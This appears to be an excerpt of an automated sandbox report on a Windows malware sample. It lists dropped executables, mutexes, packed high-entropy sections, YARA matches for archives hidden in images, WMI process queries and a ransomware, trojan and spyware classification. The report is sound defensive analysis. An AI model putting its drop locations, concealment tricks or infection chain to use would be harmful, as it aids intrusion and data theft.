Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 1_2_009E7049	1_2_009E7049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 1_2_009E8860	1_2_009E8860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 1_2_009E31A8	1_2_009E31A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 1_2_009A4B30	1_2_009A4B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 1_2_009A4DE0	1_2_009A4DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 1_2_009E2D10	1_2_009E2D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 1_2_009E779B	1_2_009E779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 1_2_009D7F36	1_2_009D7F36
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Code function: 8_2_00331000	8_2_00331000
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Code function: 8_2_00334C8C	8_2_00334C8C
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Code function: 8_2_00346F3A	8_2_00346F3A
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Code function: 10_2_00331000	10_2_00331000
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Code function: 10_2_00334C8C	10_2_00334C8C
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Code function: 10_2_00346F3A	10_2_00346F3A
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Code function: 11_3_00D8C90C	11_3_00D8C90C
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Code function: 11_3_00D8D100	11_3_00D8D100

Source: C:\Users\user\AppData\Local\Temp\main\7z.exe

Process token adjusted: Security

Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Code function: String function: 00335190 appears 92 times
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Code function: String function: 0033B767 appears 42 times
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Code function: String function: 0033F534 appears 34 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 008680C0 appears 130 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 009B80C0 appears 130 times

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_IMG_Embedded_Archive author = ditekSHen, description = Detects images embedding archives. Observed in TheRat RAT.
Source: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].png, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_IMG_Embedded_Archive author = ditekSHen, description = Detects images embedding archives. Observed in TheRat RAT.
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\output[1].png, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_IMG_Embedded_Archive author = ditekSHen, description = Detects images embedding archives. Observed in TheRat RAT.

Source: Y-Cleaner.exe.31.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: soft[1].31.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: random[1].exe0.5.dr	Static PE information: Section: .bss ZLIB complexity 1.0003343485169491
Source: random[1].exe0.5.dr	Static PE information: Section: .bss ZLIB complexity 1.0003343485169491
Source: cd2469328d.exe.5.dr	Static PE information: Section: .bss ZLIB complexity 1.0003343485169491
Source: cd2469328d.exe.5.dr	Static PE information: Section: .bss ZLIB complexity 1.0003343485169491
Source: random[1].exe1.5.dr	Static PE information: Section: ZLIB complexity 0.9974582619863014
Source: random[1].exe1.5.dr	Static PE information: Section: wekcazbo ZLIB complexity 0.9943740803274977
Source: 5cda6c90d7.exe.5.dr	Static PE information: Section: ZLIB complexity 0.9974582619863014
Source: 5cda6c90d7.exe.5.dr	Static PE information: Section: wekcazbo ZLIB complexity 0.9943740803274977
Source: cc6b47fc15.exe.5.dr	Static PE information: Section: ZLIB complexity 0.9974582619863014
Source: cc6b47fc15.exe.5.dr	Static PE information: Section: wekcazbo ZLIB complexity 0.9943740803274977
Source: random[2].exe0.5.dr	Static PE information: Section: dsmoqcnp ZLIB complexity 0.9944011532419309
Source: b6638733e4.exe.5.dr	Static PE information: Section: dsmoqcnp ZLIB complexity 0.9944011532419309
Source: random[2].exe1.5.dr	Static PE information: Section: wasfhoet ZLIB complexity 0.9943352085127763
Source: b05c9e01f3.exe.5.dr	Static PE information: Section: wasfhoet ZLIB complexity 0.9943352085127763
Source: random[2].exe2.5.dr	Static PE information: Section: tsdsdsrb ZLIB complexity 0.9900423479190835
Source: c9d0f96e57.exe.5.dr	Static PE information: Section: tsdsdsrb ZLIB complexity 0.9900423479190835
Source: random[4].exe.5.dr	Static PE information: Section: ZLIB complexity 0.9973311750856164
Source: random[4].exe.5.dr	Static PE information: Section: ltyimmoj ZLIB complexity 0.9946100175144684
Source: 142c991362.exe.5.dr	Static PE information: Section: ZLIB complexity 0.9973311750856164
Source: 142c991362.exe.5.dr	Static PE information: Section: ltyimmoj ZLIB complexity 0.9946100175144684

Source: classification engine

Classification label: mal100.rans.troj.spyw.evad.winEXE@160/109@40/20

Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe

File created: C:\Program Files\Google\Chrome\Extensions

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7672:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2588:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe	Mutant created: \Sessions\1\BaseNamedObjects\48cb35e3030a2b429c6ac414faba9b49
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	Mutant created: \Sessions\1\BaseNamedObjects\My_mutex

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\abc3bc1985

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1019807001\fed209a298.exe

Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"

Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Command line argument: .3		8_2_0033E280
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Command line argument: .3		10_2_0033E280

Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe

System information queried: HandleInformation

Jump to behavior

Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5236
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5236
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5472
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5472
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5472
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5472
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5472
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5472
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5472
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5472
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5472
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5472
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5472
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5472
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5376
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5376
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5376
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5376
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5376
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5376
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5376
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5376
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5376
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5376
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 8012
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 8012
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4364
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4364
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4364
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4364
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4364
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4364
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4364
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4364
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4364
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4364
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4364
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4364
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7844
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7844
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7912
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
